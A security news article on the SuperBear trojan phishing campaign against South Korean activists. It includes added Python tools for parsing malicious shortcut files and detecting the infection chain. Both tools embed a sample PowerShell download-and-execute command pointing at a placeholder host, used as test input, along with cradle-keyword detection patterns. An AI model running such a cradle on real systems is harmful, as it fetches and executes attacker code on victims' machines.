Sunday, September 15, 2024

New SuperBear Trojan Emerges in Focused Phishing Assault on South Korean Activists


New SuperBear Trojan Emerges in Focused Phishing Assault on South Korean Activists

A new phishing attack, likely targeting civil society groups in South Korea, has led to the discovery of a previously unknown remote access trojan (RAT) called SuperBear.

The intrusion singled out an unnamed activist who was contacted in late August 2023 and received a malicious LNK (Windows shortcut) file from an email address impersonating a member of their own organization, the non-profit Interlab said in a new report.

When executed, the LNK file launches a PowerShell command that runs a Visual Basic script, which in turn fetches the next-stage payloads from a legitimate but compromised WordPress website.

These payloads are the AutoIt3.exe interpreter binary (dropped as "solmir.pdb") and an AutoIt script (dropped as "solmir_1.pdb") that is launched using the former. Both carry a .pdb extension that does not match their true content, a common trick to make the files look like debugging symbols rather than an executable and a script.
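The first link in this chain is the LNK file, and a responder's first question is what command it launches. The following Python helper is an added example, not Interlab's tooling or the actual lure from this campaign: it parses the Shell Link header and StringData section as laid out in Microsoft's MS-SHLLINK specification (skipping the LinkTargetIDList and LinkInfo blocks and ignoring ExtraData, an assumption that is sufficient for pulling out the target, arguments and icon) and applies a few triage heuristics. The sample shortcut is constructed by the block itself; its PowerShell command line, the example.invalid URL and the shell32.dll icon are placeholders, not indicators from the report.

```python
"""Triage helper for .lnk lures: extract StringData fields from a Windows Shell Link
so the launched command can be inspected without opening the file (added example,
following MS-SHLLINK; not the real SuperBear lure)."""
import re
import struct
from dataclasses import dataclass
from typing import Optional

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HEADER_SIZE = 0x4C
SW_SHOWMINNOACTIVE = 7          # ShowCommand value lures use to keep the console window unobtrusive

# LinkFlags bits (MS-SHLLINK 2.1.1). StringData fields appear in exactly this order.
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]

LAUNCHERS = ("powershell", "pwsh", "cmd.exe", "wscript", "cscript", "mshta", "rundll32", "regsvr32")
CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biex\b|invoke-expression"
                       r"|-enc(odedcommand)?\b|frombase64string|bitsadmin|certutil", re.I)


@dataclass
class LnkInfo:
    show_command: int
    name: Optional[str] = None
    relative_path: Optional[str] = None
    working_dir: Optional[str] = None
    arguments: Optional[str] = None
    icon_location: Optional[str] = None


def parse_lnk(data: bytes) -> LnkInfo:
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    (show_command,) = struct.unpack_from("<I", data, 0x3C)
    off = HEADER_SIZE
    if flags & HAS_IDLIST:                       # IDListSize (u16) followed by IDList bytes
        (size,) = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINKINFO:                     # LinkInfoSize (u32) counts the whole structure
        (size,) = struct.unpack_from("<I", data, off)
        off += size
    unicode = bool(flags & IS_UNICODE)
    info = LnkInfo(show_command=show_command)
    for flag, field_name in STRING_FIELDS:
        if not flags & flag:
            continue
        (count,) = struct.unpack_from("<H", data, off)   # CountCharacters; string is not terminated
        off += 2
        nbytes = count * 2 if unicode else count
        raw = data[off:off + nbytes]
        if len(raw) != nbytes:
            raise ValueError(f"truncated {field_name}")
        off += nbytes
        # Assumption: ANSI strings are cp1252; the spec says "system default code page".
        setattr(info, field_name, raw.decode("utf-16-le") if unicode else raw.decode("cp1252"))
    return info


def triage(info: LnkInfo) -> list:
    """Heuristic findings for a shortcut; an empty list means nothing stood out."""
    findings = []
    text = f"{info.relative_path or ''} {info.arguments or ''}".lower()
    hosts = [h for h in LAUNCHERS if h in text]
    if hosts:
        findings.append("target is a script/LOLBin host: " + ", ".join(hosts))
    cradles = sorted({m.group(0).lower() for m in CRADLE_RE.finditer(text)})
    if cradles:
        findings.append("download/execution cradle keywords: " + ", ".join(cradles))
    if "-w hidden" in text or "windowstyle hidden" in text:
        findings.append("requests hidden window")
    if info.show_command == SW_SHOWMINNOACTIVE:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE (window minimised)")
    if hosts and info.icon_location and info.icon_location.lower().endswith(("shell32.dll", "imageres.dll")):
        findings.append("system icon on a script-host target (document lookalike)")
    return findings


def build_lnk(relative_path: str, arguments: Optional[str] = None, icon_location: Optional[str] = None,
              show_command: int = 1, idlist: bytes = b"") -> bytes:
    """Assemble a minimal Shell Link; used here only to construct the sample input."""
    flags = IS_UNICODE | (HAS_IDLIST if idlist else 0)
    values = {"relative_path": relative_path, "arguments": arguments, "icon_location": icon_location}
    body = b""
    for flag, field_name in STRING_FIELDS:
        value = values.get(field_name)
        if value is None:
            continue
        flags |= flag
        body += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    header = (struct.pack("<I16sII", HEADER_SIZE, LNK_CLSID, flags, 0)    # size, CLSID, LinkFlags, FileAttributes
              + bytes(24)                                                 # Creation/Access/Write FILETIMEs
              + struct.pack("<IIIHHII", 0, 0, show_command, 0, 0, 0, 0))  # FileSize, IconIndex, ShowCommand, HotKey, reserved
    idl = struct.pack("<H", len(idlist)) + idlist if idlist else b""
    return header + idl + body


# Well-known "My Computer" root ItemID (CLSID 20D04FE0-3AEA-1069-A2D8-08002B30309D) plus TerminalID.
MY_COMPUTER_IDLIST = bytes.fromhex("14001f50e04fd020ea3a6910a2d808002b30309d") + b"\x00\x00"


def constructed_sample() -> bytes:
    """Constructed lure (placeholder command and URL, not the campaign's real LNK)."""
    return build_lnk(
        relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        arguments="-nop -w hidden -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1')\"",
        icon_location=r"%SystemRoot%\System32\shell32.dll",
        show_command=SW_SHOWMINNOACTIVE,
        idlist=MY_COMPUTER_IDLIST,
    )


if __name__ == "__main__":
    sample = parse_lnk(constructed_sample())
    print(sample.relative_path, sample.arguments)
    for finding in triage(sample):
        print(" -", finding)
```

On a real sample, run `parse_lnk(open("lure.lnk", "rb").read())` on an analysis host; the parser never executes anything, it only reads bytes. A shortcut that points at a script host while wearing a document icon and asking for a hidden or minimised window is exactly the combination that should go to detonation rather than to the user's desktop.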

The AutoIt script, for its part, performs process injection using a process hollowing technique: a legitimate process is created in a suspended state, its original code is replaced with malicious code, and the process is then resumed so the payload runs under the legitimate image name.


In this case, an instance of Explorer.exe is spawned as the host and the never-before-seen SuperBear RAT is injected into it. The RAT establishes communications with a remote server to exfiltrate data and to download and run additional shell commands and dynamic-link libraries (DLLs).
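Each stage of the chain above leaves a process-creation record, and the parent/child relationships are what make it detectable even when file names change. The following Python block is an added example, not Interlab's detection content: it runs four rules over constructed records shaped like Sysmon Event ID 1 fields (Image, ParentImage, CommandLine, OriginalFileName). The drop directory under the user's Temp folder, the user name "victim", and the placeholder URL are assumptions for the sample; the report names the dropped files "solmir.pdb" and "solmir_1.pdb" but does not give their path.

```python
"""Detection sketch over process-creation telemetry for an Explorer -> PowerShell ->
wscript -> renamed AutoIt3 -> hollowed explorer.exe chain (added example; constructed
records in the shape of Sysmon Event ID 1 fields, not real telemetry)."""
import ntpath
import re

# Constructed sample: GUIDs are shortened to letters, paths and user name are assumptions.
EVENTS = [
    {"guid": "A", "parent": None, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"guid": "B", "parent": "A", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell.exe -nop -w hidden -c "iex (New-Object Net.WebClient).DownloadString(\'http://example.invalid/stage1\')"'},
    {"guid": "C", "parent": "B", "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r"wscript.exe C:\Users\victim\AppData\Local\Temp\stage1.vbs"},
    {"guid": "D", "parent": "C", "image": r"C:\Users\victim\AppData\Local\Temp\solmir.pdb",
     "cmd": r"C:\Users\victim\AppData\Local\Temp\solmir.pdb C:\Users\victim\AppData\Local\Temp\solmir_1.pdb",
     "original_file_name": "AutoIt3.exe"},   # PE version info still says AutoIt3.exe after the rename
    {"guid": "E", "parent": "D", "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    # benign noise that must not fire
    {"guid": "F", "parent": "A", "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe"},
    {"guid": "G", "parent": "A", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -File C:\scripts\backup.ps1"},
]

CRADLE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biex\b|invoke-expression"
                       r"|-enc(odedcommand)?\b|frombase64string", re.I)
USER_WRITABLE_RE = re.compile(r"^c:\\users\\|\\appdata\\|^c:\\programdata\\|\\temp\\", re.I)
# Assumed baseline of parents that legitimately start explorer.exe on a workstation.
EXPLORER_PARENTS = {"userinit.exe", "winlogon.exe", "explorer.exe", "svchost.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def detect(events):
    """Return (guid, rule) pairs for records matching any rule of the chain."""
    by_guid = {e["guid"]: e for e in events}
    findings = []
    for e in events:
        img = basename(e["image"])
        parent = by_guid.get(e["parent"]) if e["parent"] else None
        pimg = basename(parent["image"]) if parent else ""
        # Rule 1: PowerShell with a download/execution cradle launched from the shell (LNK double-click shape).
        if img in SHELLS and pimg == "explorer.exe" and CRADLE_RE.search(e["cmd"]):
            findings.append((e["guid"], "powershell download cradle launched from Explorer"))
        # Rule 2: a script host spawned by PowerShell, i.e. a second-stage VBS.
        if img in SCRIPT_HOSTS and pimg in SHELLS:
            findings.append((e["guid"], "wscript/cscript spawned by PowerShell"))
        # Rule 3: the AutoIt interpreter running under a different name or from a user-writable path.
        if e.get("original_file_name", "").lower() == "autoit3.exe" and (
                img != "autoit3.exe" or USER_WRITABLE_RE.search(e["image"])):
            findings.append((e["guid"], "renamed or user-dropped AutoIt3 interpreter"))
        # Rule 4: explorer.exe created by something outside the logon baseline; a hollowing host.
        if img == "explorer.exe" and parent is not None and pimg not in EXPLORER_PARENTS:
            findings.append((e["guid"], f"explorer.exe spawned by unexpected parent {pimg}"))
    return findings


def ancestry(events, guid):
    """Walk parent links back to the root so an alert can show the whole chain."""
    by_guid = {e["guid"]: e for e in events}
    chain = []
    cur = by_guid.get(guid)
    while cur is not None:
        chain.append(cur["guid"])
        cur = by_guid.get(cur["parent"]) if cur["parent"] else None
    return list(reversed(chain))


if __name__ == "__main__":
    for guid, rule in detect(EVENTS):
        print(guid, rule, "chain:", " -> ".join(ancestry(EVENTS, guid)))
```

Rule 3 is the one that survives the file rename: OriginalFileName comes from the PE version resource, which the attacker left intact when dropping the interpreter as "solmir.pdb". Rule 4 alone would fire on a user restarting Explorer from Task Manager, which is why the ancestry walk matters; a hollowed explorer.exe whose lineage runs through a cradle and a renamed interpreter is a very different alert from one whose parent is taskmgr.exe.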

"The default action for the C2 server appears to instruct clients to exfiltrate and process system data," Interlab researcher Ovi Liber said, noting that the malware is so named because "the malicious DLL will try to create a random filename for it, and if it can't it will be named 'SuperBear.'"

The attack has been loosely attributed to the North Korean nation-state actor known as Kimsuky (aka APT43, Emerald Sleet, Nickel Kimball, and Velvet Chollima), citing overlaps in the initial attack vector and the PowerShell commands used.

Earlier this year, in February, Interlab also revealed that North Korean nation-state actors had targeted a journalist in South Korea with Android malware dubbed RambleOn as part of a social engineering campaign.

